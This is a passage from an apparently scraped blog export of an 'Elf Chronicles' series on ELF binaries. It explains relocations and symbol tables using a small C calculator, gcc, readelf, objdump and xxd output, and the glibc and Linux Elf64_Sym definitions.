It\u0026rsquo;s like the VIP lounge for data that\u0026rsquo;s there to be seen but not messed with.\nlooking back at our relocation entry, we can now understand it better\n[ 0 ] Offset: 0x1a Info: 0x000300000002 (Sym: 0x3 | Type: 0x2) Addend: -4 Apply relocation at offset 0x1a in .text section. Use symbol 3 for relocation\u0026hellip; that points to .rodata section. Relocation algorithm will be R_X86_64_PC32 (S + A - P) There are many tools like readelf and objdump, that can show you relocation entries with all these things simplified.\n❯ readelf --relocs --wide calc/main.o Relocation section \u0026#39;.rela.text\u0026#39; at offset 0x3e0 contains 13 entries: Offset Info Type Symbol\u0026#39;s Value Symbol\u0026#39;s Name + Addend 000000000000001a 0000000300000002 R_X86_64_PC32 0000000000000000 .rodata - 4 0000000000000027 0000000500000004 R_X86_64_PLT32 0000000000000000 printf - 4 000000000000003d 0000000300000002 R_X86_64_PC32 0000000000000000 .rodata + 15 000000000000004a 0000000600000004 R_X86_64_PLT32 0000000000000000 __isoc99_scanf - 4 0000000000000087 0000000700000004 R_X86_64_PLT32 0000000000000000 addFunc - 4 00000000000000a4 0000000800000004 R_X86_64_PLT32 0000000000000000 subFunc - 4 00000000000000c1 0000000900000004 R_X86_64_PLT32 0000000000000000 mulFunc - 4 00000000000000de 0000000a00000004 R_X86_64_PLT32 0000000000000000 divFunc - 4 00000000000000ee 0000000300000002 R_X86_64_PC32 0000000000000000 .rodata + 1e 00000000000000f6 0000000b00000004 R_X86_64_PLT32 0000000000000000 puts - 4 0000000000000117 0000000300000002 R_X86_64_PC32 0000000000000000 .rodata + 2f 0000000000000124 0000000500000004 R_X86_64_PLT32 0000000000000000 printf - 4 000000000000013d 0000000c00000004 R_X86_64_PLT32 0000000000000000 __stack_chk_fail - 4 ❯ objdump -M intel -dr calc/main.o calc/main.o: file format elf64-x86-64 Disassembly of section .text: 0000000000000000 \u0026lt;main\u0026gt;: 0: 55 push rbp 1: 48 89 e5 mov rbp,rsp 4: 48 83 ec 20 sub rsp,0x20 8: 64 48 8b 04 25 28 00 mov rax,QWORD PTR fs:0x28 f: 00 00 11: 48 89 45 f8 mov QWORD PTR [rbp-0x8],rax 15: 31 c0 xor eax,eax 17: 48 8d 05 00 00 00 00 lea rax,[rip+0x0] # 1e \u0026lt;main+0x1e\u0026gt; 1a: R_X86_64_PC32 .rodata-0x4 1e: 48 89 c7 mov rdi,rax 21: b8 00 00 00 00 mov eax,0x0 26: e8 00 00 00 00 call 2b \u0026lt;main+0x2b\u0026gt; 27: R_X86_64_PLT32 printf-0x4 2b: 48 8d 4d f0 lea rcx,[rbp-0x10] 2f: 48 8d 55 eb lea rdx,[rbp-0x15] 33: 48 8d 45 ec lea rax,[rbp-0x14] 37: 48 89 c6 mov rsi,rax 3a: 48 8d 05 00 00 00 00 lea rax,[rip+0x0] # 41 \u0026lt;main+0x41\u0026gt; 3d: R_X86_64_PC32 .rodata+0x15 41: 48 89 c7 mov rdi,rax 44: b8 00 00 00 00 mov eax,0x0 49: e8 00 00 00 00 call 4e \u0026lt;main+0x4e\u0026gt; 4a: R_X86_64_PLT32 __isoc99_scanf-0x4 4e: 0f b6 45 eb movzx eax,BYTE PTR [rbp-0x15] 52: 0f be c0 movsx eax,al 55: 83 f8 2f cmp eax,0x2f 58: 74 74 je ce \u0026lt;main+0xce\u0026gt; 5a: 83 f8 2f cmp eax,0x2f 5d: 0f 8f 88 00 00 00 jg eb \u0026lt;main+0xeb\u0026gt; 63: 83 f8 2d cmp eax,0x2d 66: 74 2c je 94 \u0026lt;main+0x94\u0026gt; 68: 83 f8 2d cmp eax,0x2d 6b: 7f 7e jg eb \u0026lt;main+0xeb\u0026gt; 6d: 83 f8 2a cmp eax,0x2a 70: 74 3f je b1 \u0026lt;main+0xb1\u0026gt; 72: 83 f8 2b cmp eax,0x2b 75: 75 74 jne eb \u0026lt;main+0xeb\u0026gt; 77: f3 0f 10 45 f0 movss xmm0,DWORD PTR [rbp-0x10] 7c: 8b 45 ec mov eax,DWORD PTR [rbp-0x14] 7f: 0f 28 c8 movaps xmm1,xmm0 82: 66 0f 6e c0 movd xmm0,eax 86: e8 00 00 00 00 call 8b \u0026lt;main+0x8b\u0026gt; 87: R_X86_64_PLT32 addFunc-0x4 8b: 66 0f 7e c0 movd eax,xmm0 8f: 89 45 f4 mov DWORD PTR [rbp-0xc],eax 92: eb 6d jmp 101 \u0026lt;main+0x101\u0026gt; 94: f3 0f 10 45 f0 movss xmm0,DWORD PTR [rbp-0x10] 99: 8b 45 ec mov eax,DWORD PTR [rbp-0x14] 9c: 0f 28 c8 movaps xmm1,xmm0 9f: 66 0f 6e c0 movd xmm0,eax a3: e8 00 00 00 00 call a8 \u0026lt;main+0xa8\u0026gt; a4: R_X86_64_PLT32 subFunc-0x4 a8: 66 0f 7e c0 movd eax,xmm0 ac: 89 45 f4 mov DWORD PTR [rbp-0xc],eax af: eb 50 jmp 101 \u0026lt;main+0x101\u0026gt; b1: f3 0f 10 45 f0 movss xmm0,DWORD PTR [rbp-0x10] b6: 8b 45 ec mov eax,DWORD PTR [rbp-0x14] b9: 0f 28 c8 movaps xmm1,xmm0 bc: 66 0f 6e c0 movd xmm0,eax c0: e8 00 00 00 00 call c5 \u0026lt;main+0xc5\u0026gt; c1: R_X86_64_PLT32 mulFunc-0x4 c5: 66 0f 7e c0 movd eax,xmm0 c9: 89 45 f4 mov DWORD PTR [rbp-0xc],eax cc: eb 33 jmp 101 \u0026lt;main+0x101\u0026gt; ce: f3 0f 10 45 f0 movss xmm0,DWORD PTR [rbp-0x10] d3: 8b 45 ec mov eax,DWORD PTR [rbp-0x14] d6: 0f 28 c8 movaps xmm1,xmm0 d9: 66 0f 6e c0 movd xmm0,eax dd: e8 00 00 00 00 call e2 \u0026lt;main+0xe2\u0026gt; de: R_X86_64_PLT32 divFunc-0x4 e2: 66 0f 7e c0 movd eax,xmm0 e6: 89 45 f4 mov DWORD PTR [rbp-0xc],eax e9: eb 16 jmp 101 \u0026lt;main+0x101\u0026gt; eb: 48 8d 05 00 00 00 00 lea rax,[rip+0x0] # f2 \u0026lt;main+0xf2\u0026gt; ee: R_X86_64_PC32 .rodata+0x1e f2: 48 89 c7 mov rdi,rax f5: e8 00 00 00 00 call fa \u0026lt;main+0xfa\u0026gt; f6: R_X86_64_PLT32 puts-0x4 fa: b8 01 00 00 00 mov eax,0x1 ff: eb 2c jmp 12d \u0026lt;main+0x12d\u0026gt; 101: 66 0f ef d2 pxor xmm2,xmm2 105: f3 0f 5a 55 f4 cvtss2sd xmm2,DWORD PTR [rbp-0xc] 10a: 66 48 0f 7e d0 movq rax,xmm2 10f: 66 48 0f 6e c0 movq xmm0,rax 114: 48 8d 05 00 00 00 00 lea rax,[rip+0x0] # 11b \u0026lt;main+0x11b\u0026gt; 117: R_X86_64_PC32 .rodata+0x2f 11b: 48 89 c7 mov rdi,rax 11e: b8 01 00 00 00 mov eax,0x1 123: e8 00 00 00 00 call 128 \u0026lt;main+0x128\u0026gt; 124: R_X86_64_PLT32 printf-0x4 128: b8 00 00 00 00 mov eax,0x0 12d: 48 8b 55 f8 mov rdx,QWORD PTR [rbp-0x8] 131: 64 48 2b 14 25 28 00 sub rdx,QWORD PTR fs:0x28 138: 00 00 13a: 74 05 je 141 \u0026lt;main+0x141\u0026gt; 13c: e8 00 00 00 00 call 141 \u0026lt;main+0x141\u0026gt; 13d: R_X86_64_PLT32 __stack_chk_fail-0x4 141: c9 leave 142: c3 ret Conclustion Throughout this article, we explored the significance of relocations in ELF binaries, examining how compilers, assemblers, and linkers collaborate to produce executable files. We delved into the role of relocation sections, uncovering their purpose in accommodating changes to addresses and offsets during both compile-time and link-time.\nSince symbols and relocations combined are a huge topic in itself, I\u0026rsquo;m adding few links that I think are interesting and will help to better grasp the whole concept in practicality\n@xianeizhang\u0026rsquo;s notes (https://people.cs.pitt.edu/~xianeizhang/notes/Linking.html)\nUnderstanding the ELF specimen (https://hub.packtpub.com/understanding-elf-specimen/)\nCloudflare blogs on \u0026ldquo;How to execute an object file\u0026rdquo; - part 1 and part 2\nAn amazing talk by @Anders Schau Knatten on \u0026ldquo;How symbols work and why we need them\u0026rdquo; (youtube)\nSee you next time.\n","permalink":"https://ayedaemon.github.io/post/2023/12/elf-chronicles-relocations/","summary":"In previous article about Symbol Tables, we talked about the below diagram \u0026hellip;.\n┌────────────────────┐ ┌─────────────────┐ ┌─────────────────┐ │ │ │ │ │ │ │ libarithmatic.c │ │ libarithmatic.h ├───────► │ main.c │ │ │ │ │ │ │ └─────────┬──────────┘ └─────────────────┘ └────────┬────────┘ │ │ │ │ │ /* Compile + assemble */ │ /* Compile + assemble */ │ │ │ │ ▼ ▼ ┌─────────────────────┐ ┌────────────────────┐ │ │ │ │ │ libarithmatic.o │ │ main.","title":"Elf Chronicles: Relocations (6/?)"},{"content":"\u0026hellip; prologue At this point I hope you have a general idea of how a C program goes through multiple stages/passes and finally an ELF file is generated. Below is a diagram to jog your memory on this\n┌──────────────────┐ │ │ │ hello.c │ // C source │ │ └────────┬─────────┘ │ │ │ /* Compile */ │ │ │ ▼ ┌──────────────────┐ │ │ │ hello.s │ // assembler source │ │ └────────┬─────────┘ │ │ │ /* assemble */ │ │ ▼ ┌──────────────────┐ │ │ │ hello.o │ // Assembled program (ELF - relocatable) │ │ └────────┬─────────┘ │ │ │ /* link */ │ │ ▼ ┌──────────────────┐ │ │ │ hello │ // Executable binary (ELF - executable) │ │ └──────────────────┘ Creating a simple hello program is very straight-forward, let me show you how this flow works when we are building something that has more than 1 source file. This is generally what most of the \u0026ldquo;real-world\u0026rdquo; projects do, they create multiple files with different functionalities and then merge them together to complete the program with the desired features only.\n┌────────────────────┐ ┌─────────────────┐ ┌─────────────────┐ │ │ │ │ │ │ │ libarithmatic.c │ │ libarithmatic.h ├───────► │ main.c │ │ │ │ │ │ │ └─────────┬──────────┘ └─────────────────┘ └────────┬────────┘ │ │ │ │ │ /* Compile + assemble */ │ /* Compile + assemble */ │ │ │ │ ▼ ▼ ┌─────────────────────┐ ┌────────────────────┐ │ │ │ │ │ libarithmatic.o │ │ main.o │ │ │ │ │ └─────────┬───────────┘ └──────────┬─────────┘ │ │ │ │ │ │ │ │ │ /* Linking Magic */ │ └───────────────────────────────────┬──────────────────────────────────────┘ │ │ │ │ │ │ ▼ ┌────────────────┐ │ │ │ calc │ │ │ └────────────────┘ /* File: libarithmatic.c */ float addFunc (float a, float b) { return a + b; } float subFunc (float a, float b) { return a - b; } float mulFunc (float a, float b) { return a * b; } float divFunc (float a, float b) { if (b == 0) { return 0.0; } return a / b; } /* File: libarithmatic.h */ #ifndef ARITHMATIC_H #define ARITHMATIC_H float addFunc (float, float); float subFunc (float, float); float mulFunc (float, float); float divFunc (float, float); float magicFunc (float a, float b); #endif /* File: main.c */ #include \u0026lt;stdio.h\u0026gt; #include \u0026#34;libarithmatic.h\u0026#34; int main() { float num1, num2, result; char operator; printf(\u0026#34;Enter equation (9 * 6): \u0026#34;); scanf(\u0026#34;%f %c %f\u0026#34;, \u0026amp;num1, \u0026amp;operator, \u0026amp;num2); switch (operator) { case \u0026#39;+\u0026#39;: result = addFunc(num1, num2); break; case \u0026#39;-\u0026#39;: result = subFunc(num1, num2); break; case \u0026#39;*\u0026#39;: result = mulFunc(num1, num2); break; case \u0026#39;/\u0026#39;: result = divFunc(num1, num2); break; default: printf(\u0026#34;Invalid operator\\n\u0026#34;); return 1; } printf(\u0026#34;Result: %.2f\\n\u0026#34;, result); return 0; } Luckily gcc provides some features, that helps us to make this process easier.\n❯ gcc --help Usage: gcc [options] file... Options: \u0026lt;... OMITTED ...\u0026gt; -E Preprocess only; do not compile, assemble or link. -S Compile only; do not assemble or link. -c Compile and assemble, but do not link. So if you follow these commands, you’ll be fine\n# Compile + assemble -\u0026gt; generates main.o gcc -c main.c # Compile + assemble -\u0026gt; generates libarithmatic.o gcc -c libarithmatic.c # Linking -\u0026gt; generates calc gcc main.o libarithmatic.o -o calc This is our first time so far writing multiple files for a program. So let\u0026rsquo;s take a moment to understand how this works.\nFirst, we create a libarithmatic.c file with all of the required arithmatic functions - addFunc, subFunc, mulFunc, and divFunc. Since this file contains these functions (function definitions), the intermediate object file for this file will have related information as well.\nThen comes the main.c file, where we have declared the main function. Inside the main function, we have used arithmatic functions which are not defined in this file. This will give an error at compilation time when those functions will not be found, so as a promise we give a declaration that these functions are present somewhere and they will be found in later steps by linker. Here those definitions are present in libarithmatic.h file \u0026ndash; header file for libarithmatic.c.\nSo when we are compiling libarithmatic.c, it\u0026rsquo;ll create a libarithmatic.o file which will have 4 arithmatic functions as defined. On the other hand, main.c will generate a main.o file that will have a main function which will be trying to call the arithmatic functions - addFunc, subFunc, mulFunc, and divFunc.\nQuestion - How did main.o call these functions when the address of these functions is not known to the compiler??\nAnswer - Compiler takes main.c and libarithmatic.h (a promise that these will be present when linking), and then generates the main.o with all of the call instructions\u0026hellip; but because of the fact that it does not know the address of the functions to be called these addresses are left blank. These blanks will be filled by linker during relocation process.\nHere is a proof that all of them are empty before linking and have all of the addresses fixed up after linking\n## Before linking - main.o ❯ objdump -M intel -D -j .text main.o | grep call 26: e8 00 00 00 00 call 2b \u0026lt;main+0x2b\u0026gt; 49: e8 00 00 00 00 call 4e \u0026lt;main+0x4e\u0026gt; 86: e8 00 00 00 00 call 8b \u0026lt;main+0x8b\u0026gt; a3: e8 00 00 00 00 call a8 \u0026lt;main+0xa8\u0026gt; c0: e8 00 00 00 00 call c5 \u0026lt;main+0xc5\u0026gt; dd: e8 00 00 00 00 call e2 \u0026lt;main+0xe2\u0026gt; f5: e8 00 00 00 00 call fa \u0026lt;main+0xfa\u0026gt; 123: e8 00 00 00 00 call 128 \u0026lt;main+0x128\u0026gt; 13c: e8 00 00 00 00 call 141 \u0026lt;main+0x141\u0026gt; ## After linking - calc ❯ objdump -M intel -D -j .text calc | grep call 1138: e8 63 ff ff ff call 10a0 \u0026lt;_start+0x30\u0026gt; 118f: e8 bc fe ff ff call 1050 \u0026lt;printf@plt\u0026gt; 11b2: e8 a9 fe ff ff call 1060 \u0026lt;__isoc99_scanf@plt\u0026gt; 11ef: e8 b8 00 00 00 call 12ac \u0026lt;addFunc\u0026gt; 120c: e8 b5 00 00 00 call 12c6 \u0026lt;subFunc\u0026gt; 1229: e8 b2 00 00 00 call 12e0 \u0026lt;mulFunc\u0026gt; 1246: e8 af 00 00 00 call 12fa \u0026lt;divFunc\u0026gt; 125e: e8 cd fd ff ff call 1030 \u0026lt;puts@plt\u0026gt; 128c: e8 bf fd ff ff call 1050 \u0026lt;printf@plt\u0026gt; 12a5: e8 96 fd ff ff call 1040 \u0026lt;__stack_chk_fail@plt\u0026gt; Symbols and symbol tables Now the question is that how does linker know which blanks to fill and how to fill them?? \u0026hellip;here comes the role of symbols and symbol tables.\nWhen writing a program, we often use \u0026ldquo;names\u0026rdquo; to reference \u0026ldquo;objects\u0026rdquo; in our code, like function \u0026ldquo;names\u0026rdquo; and variable \u0026ldquo;names\u0026rdquo;. These \u0026ldquo;names\u0026rdquo; are commonly referred to as symbols. (yeah, deal with it now!)\nKeep in mind that not all \u0026ldquo;names\u0026rdquo; are symbols. For example, a local variables to a function won\u0026rsquo;t be treated as symbols. If you think it through, you don\u0026rsquo;t need linker to handle that data so what\u0026rsquo;s the point of adding that info as a symbol, right?\nAnother worth noting thing is that unlike string tables, symbol tables have a well-defined structure, and both Glibc and the Linux kernel define a struct for this (Elf64_Sym for 64-bit files).\n/* Glibc https://sourceware.org/git/?p=glibc.git;a=blob;f=elf/elf.h;hb=2bd00179885928fd95fcabfafc50e7b5c6e660d2#l530 */ typedef struct { Elf64_Word st_name; /* Symbol name (string tbl index) */ unsigned char st_info; /* Symbol type and binding */ unsigned char st_other; /* Symbol visibility */ Elf64_Section st_shndx; /* Section index */ Elf64_Addr st_value; /* Symbol value */ Elf64_Xword st_size; /* Symbol size */ } Elf64_Sym; /* Linux kernel v6.5.8 https://elixir.bootlin.com/linux/v6.5.8/source/include/uapi/linux/elf.h#L197 */ typedef struct elf64_sym { Elf64_Word st_name;\t/* Symbol name, index in string tbl */ unsigned char\tst_info;\t/* Type and binding attributes */ unsigned char\tst_other;\t/* No defined meaning, 0 */ Elf64_Half st_shndx;\t/* Associated section index */ Elf64_Addr st_value;\t/* Value of the symbol */ Elf64_Xword st_size;\t/* Associated symbol size */ } Elf64_Sym; Let\u0026rsquo;s see what each member of this struct resembles\nst_name Similar to other name fields in the ELF specification, this member stores the index or offset in the associated string table.\nst_info This member represents a combined value derived from two different but related attributes: bind and type.\nBoth, Linux Kernel and glibc provide definitions and macros to work with this member.\n1. Bind The \u0026ldquo;bind\u0026rdquo; bits provide information about where this symbol can be seen and used\u0026hellip; There are 3 kinds of binding defined by linux kernel\n/* https://elixir.bootlin.com/linux/v6.5.8/source/include/uapi/linux/elf.h#L123 */ #define STB_LOCAL 0 /* not visible outside the object file */ #define STB_GLOBAL 1 /* visible to all object files */ #define STB_WEAK 2 /* like globals, but with lower precedence */ But glibc adds few more to this list\n/* https://sourceware.org/git/?p=glibc.git;a=blob;f=elf/elf.h;hb=2bd00179885928fd95fcabfafc50e7b5c6e660d2#l582 */ #define STB_LOCAL 0 /* Local symbol */ #define STB_GLOBAL 1 /* Global symbol */ #define STB_WEAK 2 /* Weak symbol */ #define STB_NUM 3 /* Number of defined types. */ #define STB_LOOS 10 /* Start of OS-specific */ #define STB_GNU_UNIQUE 10 /* Unique symbol. */ #define STB_HIOS 12 /* End of OS-specific */ #define STB_LOPROC 13 /* Start of processor-specific */ #define STB_HIPROC 15 /* End of processor-specific */ Kernel and glibc both provide a macro to extract the bind value from the provided st_info member - #define ELF_ST_BIND(x)\t((x) \u0026gt;\u0026gt; 4)\n2. Type type bits tells about the type of symbol - function, file, variable, etc. One could say \u0026ndash; A general classification for the symbol.\nLinux kernel defines total 7 types\n/* https://elixir.bootlin.com/linux/v6.5.8/source/include/uapi/linux/elf.h#L128 */ #define STT_NOTYPE 0 /* Unspecified */ #define STT_OBJECT 1 /* data objects like variables, arrays, etc*/ #define STT_FUNC 2 /* functions or other executable codes*/ #define STT_SECTION 3 /* associated with a section; mainly used for relocations (we\u0026#39;ll see relocations in later articles)*/ #define STT_FILE 4 /* name of the source file*/ #define STT_COMMON 5 /* just like STT_OBJECT, but for tentative values */ #define STT_TLS 6 /* stores thread local data which is unique to each thread */ And again our beloved glibc expanded these definitions\n/* https://sourceware.org/git/?p=glibc.git;a=blob;f=elf/elf.h;hb=2bd00179885928fd95fcabfafc50e7b5c6e660d2#l595 */ #define STT_NOTYPE 0 /* Symbol type is unspecified */ #define STT_OBJECT 1 /* Symbol is a data object */ #define STT_FUNC 2 /* Symbol is a code object */ #define STT_SECTION 3 /* Symbol associated with a section */ #define STT_FILE 4 /* Symbol\u0026#39;s name is file name */ #define STT_COMMON 5 /* Symbol is a common data object */ #define STT_TLS 6 /* Symbol is thread-local data object*/ #define STT_NUM 7 /* Number of defined types. */ #define STT_LOOS 10 /* Start of OS-specific */ #define STT_GNU_IFUNC 10 /* Symbol is indirect code object */ #define STT_HIOS 12 /* End of OS-specific */ #define STT_LOPROC 13 /* Start of processor-specific */ #define STT_HIPROC 15 /* End of processor-specific */ Kernel and glibc both provide a macro to extract the type value from the provided st_info member - #define ELF_ST_TYPE(x) ((x) \u0026amp; 0xf)\nst_other If you examine the Elf64_Sym struct in both the kernel and Glibc source code, you\u0026rsquo;ll notice that the kernel doesn\u0026rsquo;t currently have any use case for this field and marks it as such. However, Glibc uses this field to track the visibility of the symbol.\n/* https://sourceware.org/git/?p=glibc.git;a=blob;f=elf/elf.h;hb=2bd00179885928fd95fcabfafc50e7b5c6e660d2#l626 */ #define STV_DEFAULT 0 /* Default symbol visibility rules - as specified by symbol binding*/ #define STV_INTERNAL 1 /* Processor specific hidden class */ #define STV_HIDDEN 2 /* Sym unavailable in other modules */ #define STV_PROTECTED 3 /* Not preemptible, not exported */ From what I understand, symbol visibility (yup, this is what glibc calls st_other) extends the concept of symbol binding and provides more control over symbol access.\nYou can read more about this member from here 1 and here 2.\nst_shndx This attribute indicates the section associated with this symbol. It holds the section index corresponding to the sections in the section header.\nst_value Indeed, each symbol should have both a name and an associated value. This member holds the value associated with the respective symbol.\nst_size Many symbols come with associated sizes, for function type symbols this will be the size of that function. If a symbol doesn\u0026rsquo;t have a size or its size is unknown, this member holds a value of zero.\nAnalysis Now that we have a foundational understanding, we can apply this knowledge to analyze our previous files.\n1. libarithmatic.o To keep things straightforward, I\u0026rsquo;ll begin by listing all the sections in the libarithmatic.o file. (This is the output from my parser, you can use hexdumps or any other parser of your choice\u0026hellip;)\n[ 00 ] Section Name: Type: 0x0 Flags: 0x0 Addr: 0x0 Offset: 0x0 Size: 0 Link: 0 Info: 0x0 Addralign: 0x0 Entsize: 0 [ 01 ] Section Name: .text Type: 0x1 Flags: 0x6 Addr: 0x0 Offset: 0x40 Size: 130 Link: 0 Info: 0x0 Addralign: 0x1 Entsize: 0 [ 02 ] Section Name: .data Type: 0x1 Flags: 0x3 Addr: 0x0 Offset: 0xc2 Size: 0 Link: 0 Info: 0x0 Addralign: 0x1 Entsize: 0 [ 03 ] Section Name: .bss Type: 0x8 Flags: 0x3 Addr: 0x0 Offset: 0xc2 Size: 0 Link: 0 Info: 0x0 Addralign: 0x1 Entsize: 0 [ 04 ] Section Name: .comment Type: 0x1 Flags: 0x30 Addr: 0x0 Offset: 0xc2 Size: 28 Link: 0 Info: 0x0 Addralign: 0x1 Entsize: 1 [ 05 ] Section Name: .note.GNU-stack Type: 0x1 Flags: 0x0 Addr: 0x0 Offset: 0xde Size: 0 Link: 0 Info: 0x0 Addralign: 0x1 Entsize: 0 [ 06 ] Section Name: .note.gnu.property Type: 0x7 Flags: 0x2 Addr: 0x0 Offset: 0xe0 Size: 48 Link: 0 Info: 0x0 Addralign: 0x8 Entsize: 0 [ 07 ] Section Name: .eh_frame Type: 0x1 Flags: 0x2 Addr: 0x0 Offset: 0x110 Size: 152 Link: 0 Info: 0x0 Addralign: 0x8 Entsize: 0 [ 08 ] Section Name: .rela.eh_frame Type: 0x4 Flags: 0x40 Addr: 0x0 Offset: 0x288 Size: 96 Link: 9 Info: 0x7 Addralign: 0x8 Entsize: 24 [ 09 ] Section Name: .symtab Type: 0x2 Flags: 0x0 Addr: 0x0 Offset: 0x1a8 Size: 168 Link: 10 Info: 0x3 Addralign: 0x8 Entsize: 24 [ 10 ] Section Name: .strtab Type: 0x3 Flags: 0x0 Addr: 0x0 Offset: 0x250 Size: 49 Link: 0 Info: 0x0 Addralign: 0x1 Entsize: 0 [ 11 ] Section Name: .shstrtab Type: 0x3 Flags: 0x0 Addr: 0x0 Offset: 0x2e8 Size: 103 Link: 0 Info: 0x0 Addralign: 0x1 Entsize: 0 Now we can easily filter out the symbol table from this (Type: 0x2)\n[ 09 ] Section Name: .symtab Type: 0x2 Flags: 0x0 Addr: 0x0 Offset: 0x1a8 Size: 168 Link: 10 Info: 0x3 Addralign: 0x8 Entsize: 24 If you go back and revisit the article about section headers and check the explaination about members, you\u0026rsquo;ll be able to conclude this \u0026ndash; .symtab section is linked to .strtab section. So the offset values from st_name of symbol table can be resolved to proper strings using this string table.\n┌─────────────────────────────────┐ │ │ │ [ 09 ] Section Name: .symtab │ │ Type: 0x2 │ │ Flags: 0x0 │ │ Addr: 0x0 │ │ Offset: 0x1a8 │ │ Size: 168 │ ┌────┼────────── Link: 10 │ │ │ Info: 0x3 │ │ │ Addralign: 0x8 │ │ │ Entsize: 24 │ │ │ │ │ │ │ │ └─────────────────────────────────┘ │ │ │ │ │ ┌─────────────────────────────────┐ │ │ │ └────┤► [ 10 ] Section Name: .strtab │ │ Type: 0x3 │ │ Flags: 0x0 │ │ Addr: 0x0 │ │ Offset: 0x250 │ │ Size: 49 │ │ Link: 0 │ │ Info: 0x0 │ │ Addralign: 0x1 │ │ Entsize: 0 │ │ │ │ │ └─────────────────────────────────┘ Now we can begin with the interesting stuff and the first step will be to pull out the .symtab section and parse it.\n############ Explaination ################# # # xxd # -s 0x1a8 # start point (Offset: 0x1a8) # -l 168 # total length (Size: 168) # -c 24 # bytes per line (Entsize: 24) - I wanted to get each entry in a single line for uniformity # libarithmatic.o # filename # | nl -v0 # line numbers starting from 0 # ############################################# ❯ xxd -s 0x1a8 -l 168 -c 24 libarithmatic.o | nl -v0 0 000001a8: 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000 ........................ 1 000001c0: 0100 0000 0400 f1ff 0000 0000 0000 0000 0000 0000 0000 0000 ........................ 2 000001d8: 0000 0000 0300 0100 0000 0000 0000 0000 0000 0000 0000 0000 ........................ 3 000001f0: 1100 0000 1200 0100 0000 0000 0000 0000 1a00 0000 0000 0000 ........................ 4 00000208: 1900 0000 1200 0100 1a00 0000 0000 0000 1a00 0000 0000 0000 ........................ 5 00000220: 2100 0000 1200 0100 3400 0000 0000 0000 1a00 0000 0000 0000 !.......4............... 6 00000238: 2900 0000 1200 0100 4e00 0000 0000 0000 3400 0000 0000 0000 ).......N.......4....... If we parse this data using the struct Elf64_Sym, we\u0026rsquo;ll get something like this\ntypedef struct { +------------------------------Elf64_Word st_name; | | +---------------------unsigned char st_info; | | | | +---------------unsigned char st_other; | | | | | | +----------Elf64_Section st_shndx; | | | | | | | | Elf64_Addr st_value;----+ | | | | | | | | | Elf64_Xword st_size;-----+-----------------+ | | | | | | | | | | } Elf64_Sym; | | | | | | | | | | | | | | | | | +-------------------+ | | | | | | | | | | +------------------+ | | | | | | | | | | +-------------------+ | | | | | | | | | | +-------------------+ | | | | | | | | | | | v v v v v v Index | Offset | 0 | 000001a8:| 0000 0000 | 00 | 00 | 0000 | 0000 0000 0000 0000 | 0000 0000 0000 0000 | 1 | 000001c0:| 0100 0000 | 04 | 00 | f1ff | 0000 0000 0000 0000 | 0000 0000 0000 0000 | 2 | 000001d8:| 0000 0000 | 03 | 00 | 0100 | 0000 0000 0000 0000 | 0000 0000 0000 0000 | 3 | 000001f0:| 1100 0000 | 12 | 00 | 0100 | 0000 0000 0000 0000 | 1a00 0000 0000 0000 | 4 | 00000208:| 1900 0000 | 12 | 00 | 0100 | 1a00 0000 0000 0000 | 1a00 0000 0000 0000 | 5 | 00000220:| 2100 0000 | 12 | 00 | 0100 | 3400 0000 0000 0000 | 1a00 0000 0000 0000 | 6 | 00000238:| 2900 0000 | 12 | 00 | 0100 | 4e00 0000 0000 0000 | 3400 0000 0000 0000 | From my parser, I got this result\n[ 0 ] Name: Info: 0x00 (Bind: 0x0 | Type: 0x0) Other: 0x0 Shndx: 0x0 Value: 0x000000000000 Size: 0x0 [ 1 ] Name: libarithmatic.c Info: 0x04 (Bind: 0x0 | Type: 0x4) Other: 0x0 Shndx: 0xfff1 Value: 0x000000000000 Size: 0x0 [ 2 ] Name: Info: 0x03 (Bind: 0x0 | Type: 0x3) Other: 0x0 Shndx: 0x1 Value: 0x000000000000 Size: 0x0 [ 3 ] Name: addFunc Info: 0x18 (Bind: 0x1 | Type: 0x2) Other: 0x0 Shndx: 0x1 Value: 0x000000000000 Size: 0x1a [ 4 ] Name: subFunc Info: 0x18 (Bind: 0x1 | Type: 0x2) Other: 0x0 Shndx: 0x1 Value: 0x00000000001a Size: 0x1a [ 5 ] Name: mulFunc Info: 0x18 (Bind: 0x1 | Type: 0x2) Other: 0x0 Shndx: 0x1 Value: 0x000000000034 Size: 0x1a [ 6 ] Name: divFunc Info: 0x18 (Bind: 0x1 | Type: 0x2) Other: 0x0 Shndx: 0x1 Value: 0x00000000004e Size: 0x34 For the sake of simplicity and the scope of this article, I\u0026rsquo;ll focus on discussing the four functions in this table and leave the rest for you to explore and learn.\nWe can observe that the st_info value for all of these symbols is the same, which implies that their \u0026ldquo;bind\u0026rdquo; and \u0026ldquo;type\u0026rdquo; values are identical (duhh). According to the information we\u0026rsquo;ve gathered, these symbols are GLOBAL (bind=0x1) and of FUNC (type=0x2) type. This indicates that these symbols are basically global functions and can be called from other files as well.\nIt\u0026rsquo;s worth noting that there\u0026rsquo;s a very cool tool called \u0026quot;ftrace\u0026quot; by elfmaster, which utilizes this information to trace function calls, specifically focusing on function calls and not other symbols.\nFurthermore, the st_other field is empty for these members, indicating default symbol visibility. There\u0026rsquo;s nothing noteworthy to discuss here.\nSo we move on to the sh_shndx (section index) member. This member tells us that all of these symbols are associated with section 0x1 (which is .text, and that does make sense \u0026ndash; Code of these functions should be in .text section only).\nThe st_value field indicates the offset within the .text section at which these functions begin. So, if you start executing instructions from offset 0x34 in the .text section, you\u0026rsquo;ll be running the mulFunc function. Makes sense??\nThe linker will perform relocation on the object files and generate a final executable binary that will have all the values in correct places. At that point we won\u0026rsquo;t need the mulFunc string in our ELF file.\nLast but not least, the st_size field provides the size of the function. This helps the magical entity reading the code determine when to stop and understand the boundaries of the function.\n2. main.o Performing the same initial process for the main.o file, you will be able yield its symbol table, as shown below.\n[ 11 ] Section Name: .symtab Type: 0x2 Flags: 0x0 Addr: 0x0 Offset: 0x248 Size: 312 Link: 12 Info: 0x4 Addralign: 0x8 Entsize: 24 [ 0 ] Name: Info: 0x00 (Bind: 0x0 | Type: 0x0) Other: 0x0 Shndx: 0x0 Value: 0x000000000000 Size: 0x0 [ 1 ] Name: main.c Info: 0x04 (Bind: 0x0 | Type: 0x4) Other: 0x0 Shndx: 0xfff1 Value: 0x000000000000 Size: 0x0 [ 2 ] Name: Info: 0x03 (Bind: 0x0 | Type: 0x3) Other: 0x0 Shndx: 0x1 Value: 0x000000000000 Size: 0x0 [ 3 ] Name: Info: 0x03 (Bind: 0x0 | Type: 0x3) Other: 0x0 Shndx: 0x5 Value: 0x000000000000 Size: 0x0 [ 4 ] Name: main Info: 0x18 